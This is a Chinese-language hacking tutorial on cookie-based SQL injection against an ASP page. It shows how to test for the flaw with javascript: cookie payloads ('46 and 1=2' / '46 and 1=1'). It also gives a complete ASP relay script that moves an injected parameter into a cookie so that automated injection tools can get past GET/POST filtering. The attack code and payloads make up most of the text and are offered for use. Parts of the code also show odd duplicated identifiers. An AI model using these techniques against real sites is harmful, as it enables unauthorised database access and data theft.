cookie注入

手工方法如下：
比如网址如下http://zzz.com/cplb.asp?id=46，对GET以及POST提交的数据都进行了检测，也没办法饶过。首先打开上面的 地址，再清空地址栏，输入javascript:alert(document.cookie=”id=”+escape(“46 and 1=2″))，再输入http://zzz.com/cplb.asp，页面返回错误，说明有希望；提交 javascript:alert(document.cookie=”id=”+escape(“46 and 1=1″))，最后输入http://zzz.com/cplb.asp，这次返回完全正常；可以确定存在cookie注入。以下代码来自寂寞的刺猬 [L.S.T]:

< %
cookname=request("jmdcw")
cookname=escape(cookname)
jmstr="id="&cookname '存在注入的变量
jmstr=replace(jmstr,chr(32),"%20")
jmstr=replace(jmstr,chr(43),"%2b")

'// 以下三行需要修改，Cookies值可以用Domain3.5浏览下就得到了~~
jmurl="http://zzz.com /cplb.asp" '存在注入的网址
jmref="http://zzz.com/index.asp" '来源地址
jmcok="ASPSESSIONIDCQTAQBSQ=ALGDAPNDKCOHJNDCAMOHDHLK"

jmcokjmcok=jmcok& ";"&jmstr&";"
response.write postdata(jmurl,jmcok,jmref)
function postdata(posturl,postcok,postref)
dim http
set http=server.createobject("msxml2.serverxmlhttp")
with http
.open "POST",posturl,false
.setRequestheader "content-type","application/x-www-form-urlencoded"
.setrequestheader "referer",postref
.setrequestheader "cookie",postcok '提交cookie值
.send() '发送数据
postdata=.responsebody '得到返回的二进制信息
end with
set http=nothing
postdata=bytes2BSTR(postdata) '转换二进制流
end function

function bytes2BSTR(vin)
dim strReturn
dim i,thischarcode,nextcharcode
strReturn=""
for i=1 to lenB(vin)
thischarcode=ascB(midB(vin,1,1))
if thischarcode<&H80 then
strReturnstrReturn=strReturn&chr(thischarcode)
else
nextcharcode=ascB(midB(vin,1+1,1))
strReturnstrReturn=strReturn&chr(clng(thischarcode) * &H100+cint(nextcharcode))
ii=i+1
end if
next
bytes2BSTR=strReturn
end function
%>

保存为jmdcw.asp，最后可以本机装个IIS或绿色的 aspsrv.exe，那么注入地址就是http://127.0.0.1/jmdcw.asp?jmdcw=46，直接用工具就OK了。